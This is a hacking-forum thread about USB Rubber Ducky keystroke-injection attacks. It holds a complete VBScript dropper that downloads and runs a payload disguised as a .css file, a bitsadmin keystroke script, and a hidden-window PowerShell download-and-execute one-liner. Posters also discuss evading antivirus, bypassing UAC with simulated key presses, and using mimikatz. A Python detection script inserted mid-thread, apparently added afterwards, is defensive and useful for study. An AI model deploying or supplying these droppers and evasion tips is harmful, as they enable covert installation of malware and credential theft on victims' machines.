Hashirama Posted November 22, 2015

So, this script downloads VB script via cmd and which downloads payload.exe.

To use this script you'll need some prep to do. First, sign up for a free website hosting (like eu.pn). You don't need to create any website, just to use that host for easy payload downloads. Rename VB script from .vbs to .css, also do the same for the payload from .exe to .css.

WHY? Because you can't upload other file formats but html, css, js, and image formats and you need a full path link for this to work! And NO, you don't have to have admin rights for this to work!

VB script:

```
SaveWebBinary "http://yourfreesubdomain.eu.pn/payload.css", "C:\Users\Public\payload.exe"

Function SaveWebBinary(strUrl, strFile) 'As Boolean
    Const adTypeBinary = 1
    Const adSaveCreateOverWrite = 2
    Const ForWriting = 2
    Dim web, varByteArray, strData, strBuffer, lngCounter, ado
    On Error Resume Next
    'Download the file with any available object
    Err.Clear
    Set web = Nothing
    Set web = CreateObject("WinHttp.WinHttpRequest.5.1")
    If web Is Nothing Then Set web = CreateObject("WinHttp.WinHttpRequest")
    If web Is Nothing Then Set web = CreateObject("MSXML2.ServerXMLHTTP")
    If web Is Nothing Then Set web = CreateObject("Microsoft.XMLHTTP")
    web.Open "GET", strURL, False
    web.Send
    If Err.Number <> 0 Then
        SaveWebBinary = False
        Set web = Nothing
        Exit Function
    End If
    If web.Status <> "200" Then
        SaveWebBinary = False
        Set web = Nothing
        Exit Function
    End If
    varByteArray = web.ResponseBody
    Set web = Nothing
    'Now save the file with any available method
    On Error Resume Next
    Set ado = Nothing
    Set ado = CreateObject("ADODB.Stream")
    If ado Is Nothing Then
        Set fs = CreateObject("Scripting.FileSystemObject")
        Set ts = fs.OpenTextFile(strFile, ForWriting, True)
        strData = ""
        strBuffer = ""
        For lngCounter = 0 to UBound(varByteArray)
            ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))
        Next
        ts.Close
    Else
        ado.Type = adTypeBinary
        ado.Open
        ado.Write varByteArray
        ado.SaveToFile strFile, adSaveCreateOverWrite
        ado.Close
    End If
    SaveWebBinary = True
End Function

wscript.sleep 5000
CreateObject("WScript.Shell").Run "C:\Users\Public\payload.exe"
```

Ducky script:

```
GUI r
DELAY 200
STRING cmd /C bitsadmin /transfer /download /priority foreground http://yourfreesubdomain.eu.pn/vb_script.css C:\Users\Public\dl.vbs && start C:\Users\Public\dl.vbs
ENTER
```

Happy hacking!

FlashOut Posted February 18, 2016

hey seems to be nice but the vb script get detected by my AV software :(

White Light Posted February 18, 2016

Why download and use the VB script to download the end file when you can just download and execute the file directly?

Hashirama (Author) Posted February 18, 2016

> hey seems to be nice but the vb script get detected by my AV software :(

What AV are you using?

Hashirama (Author) Posted February 18, 2016

> Why download and use the VB script to download the end file when you can just download and execute the file directly?

Because it's all about the speed. In this case you only need 3 seconds and you are done. VB file is small, which means less download time, and less download time means CMD window will be gone in a flash.

White Light Posted February 19, 2016

> Because it's all about the speed. In this case you only need 3 seconds and you are done. VB file is small, which means less download time, and less download time means CMD window will be gone in a flash.

You could instead use powershell, which would have maybe 0.2s of visibility on the screen if run with the hidden windowstyle.

```
(New-Object Net.WebClient).DownloadFile('http://yourhost.com/helpfulexecutable.exe','C:\helper.exe');&'C:\helper.exe'
```
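
A defender's view of the two download-and-run chains in this thread (the bitsadmin/VBS chain from the first post and the PowerShell `DownloadFile` one-liner above), as an added example that is not part of any post: it scores process-creation command lines for the traits the posts describe. The rule names, the sample log lines and the `-WindowStyle Hidden` prefix on the second sample are constructed for illustration.

```python
import ntpath
import re
from urllib.parse import urlparse

# Extensions that a command-line download should not be writing to disk.
EXEC_EXT = {".exe", ".vbs", ".js", ".bat", ".cmd", ".ps1", ".scr", ".dll"}
URL_RE = re.compile(r"https?://[^\s'\"),]+", re.I)
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s'\"),;&]+")
CHAIN_RE = re.compile(r"&&?\s*start\s|;\s*&\s*'", re.I)

def ext(name):
    """Lower-cased file extension of a URL path or a Windows path."""
    if name.lower().startswith("http"):
        name = urlparse(name).path
    return ntpath.splitext(name)[1].lower()

def findings(cmdline):
    """Reasons a process command line matches the download-and-run chain."""
    low = cmdline.lower()
    urls, paths = URL_RE.findall(cmdline), PATH_RE.findall(cmdline)
    hits = []
    if "bitsadmin" in low and "/transfer" in low and urls:
        hits.append("bitsadmin-transfer")
    if "downloadfile" in low and urls:
        hits.append("webclient-downloadfile")
    if not hits:
        return hits  # no downloader seen, nothing else to score
    dests = [p for p in paths if ext(p) in EXEC_EXT]
    if dests:
        hits.append("executable-destination")
    # Remote name looks harmless (.css) but lands as .vbs/.exe locally.
    if any(ext(u) not in EXEC_EXT for u in urls) and dests:
        hits.append("extension-mismatch")
    if any(p.lower().startswith("c:\\users\\public\\") for p in paths):
        hits.append("public-staging-dir")
    if CHAIN_RE.search(cmdline):
        hits.append("chained-execution")
    return hits

# Constructed process-creation command lines (e.g. Sysmon Event ID 1 / 4688).
SAMPLES = [
    r"cmd /C bitsadmin /transfer /download /priority foreground http://yourfreesubdomain.eu.pn/vb_script.css C:\Users\Public\dl.vbs && start C:\Users\Public\dl.vbs",
    r"powershell -WindowStyle Hidden (New-Object Net.WebClient).DownloadFile('http://yourhost.com/helpfulexecutable.exe','C:\helper.exe');&'C:\helper.exe'",
    r"bitsadmin /list /allusers",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(findings(line) or "clean", "<-", line[:60])
```

The same traits map directly onto SIEM or EDR rules keyed on process command-line fields; the extension-mismatch check is what catches the `.css` renaming trick from the first post.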

FlashOut Posted February 19, 2016

i use panda free antivirus

is there any other vb script which do the same but don't get detected? it also useful because you can change the download file on your webspace and you don't need to change the rubby usb inject.bin :D

Hashirama (Author) Posted February 20, 2016

> You could instead use powershell, which would have maybe 0.2s of visibility on the screen if run with the hidden windowstyle.
>
> (New-Object Net.WebClient).DownloadFile('http://yourhost.com/helpfulexecutable.exe','C:\helper.exe');&'C:\helper.exe'

I was thinking on powershell, but I couldn't find the info which windows os has it installed by default, so I'm using vb just to be sure it'll work.

Hashirama (Author) Posted February 20, 2016

> i use panda free antivirus
>
> is there any other vb script which do the same but don't get detected? it also useful because you can change the download file on your webspace and you don't need to change the rubby usb inject.bin :D

I scanned vb script on virus total, and didn't get any detections.

FlashOut Posted February 20, 2016

https://www.virustotal.com/de/file/93f47a42353bbf6a88332c0a18b721254e991a0476a6d155fbac60a80fe85bc2/analysis/1455991661/

lol my av detects it panda :) i thought its a bad av scanner but on most av its clean so its usable xD

Hashirama (Author) Posted February 20, 2016

> https://www.virustotal.com/de/file/93f47a42353bbf6a88332c0a18b721254e991a0476a6d155fbac60a80fe85bc2/analysis/1455991661/
>
> lol my av detects it panda :) i thought its a bad av scanner but on most av its clean so its usable xD

Damn, AVs are updated too fast. LoL

Anyway, simple google search will get you a lot of vb scripts for downloading a file.

White Light Posted February 20, 2016

> I was thinking on powershell, but I couldn't find the info which windows os has it installed by default, so I'm using vb just to be sure it'll work.

I believe everything since Vista SP1 has it enabled by default. On the other hand, I believe bitsadmin is supported by even fewer versions.

Hashirama (Author) Posted February 21, 2016

> I believe everything since Vista SP1 has it enabled by default. On the other hand, I believe bitsadmin is supported by even fewer versions.

Are you sure? Because bitsadmin is on win10.

Anyway does anyone know any vb script with privs escalation or uac bypass? Tried google, tried deep web, but found nothing helpful.

White Light Posted February 22, 2016

> Are you sure? Because bitsadmin is on win10.
>
> Anyway does anyone know any vb script with privs escalation or uac bypass? Tried google, tried deep web, but found nothing helpful.

I know bitsadmin came with XP SP1 support tools, but I was fairly certain that it only came if you had Pro and not Home (a lot of things weren't available for the Home edition) unless you specifically downloaded it yourself. Past XP it was included by default. Either way, bitsadmin was deprecated when Windows 7 came out in favor of using powershell.

As for a UAC bypass using VBS...dude, do you really think it'd be as simple as a bit of code you could just copy and paste from some website? Give MS some credit. If anything like that was released in the wild, it'd be patched in no time. You can't even simulate keystrokes to try to navigate the UAC prompt. That being said, when you plug in a keyboard you can easily use key presses to approve admin access, and once you have that you can easily maintain it.

Hashirama (Author) Posted February 22, 2016

> I know bitsadmin came with XP SP1 support tools, but I was fairly certain that it only came if you had Pro and not Home (a lot of things weren't available for the Home edition) unless you specifically downloaded it yourself. Past XP it was included by default. Either way, bitsadmin was deprecated when Windows 7 came out in favor of using powershell.
>
> As for a UAC bypass using VBS...dude, do you really think it'd be as simple as a bit of code you could just copy and paste from some website? Give MS some credit. If anything like that was released in the wild, it'd be patched in no time. You can't even simulate keystrokes to try to navigate the UAC prompt. That being said, when you plug in a keyboard you can easily use key presses to approve admin access, and once you have that you can easily maintain it.

I tried simulating keystrokes and it didn't work. But the mimikatz is still working, I'm trying to implement it somehow.

White Light Posted February 22, 2016

> I tried simulating keystrokes and it didn't work. But the mimikatz is still working, I'm trying to implement it somehow.

The point I was trying to make at the end there is that you should get admin immediately, then you can maintain it easily. Having physical access means that all security measures are basically pointless, all that matters is automating it. In this case, using the ducky to send ALT y while at a UAC prompt will accept it and continue.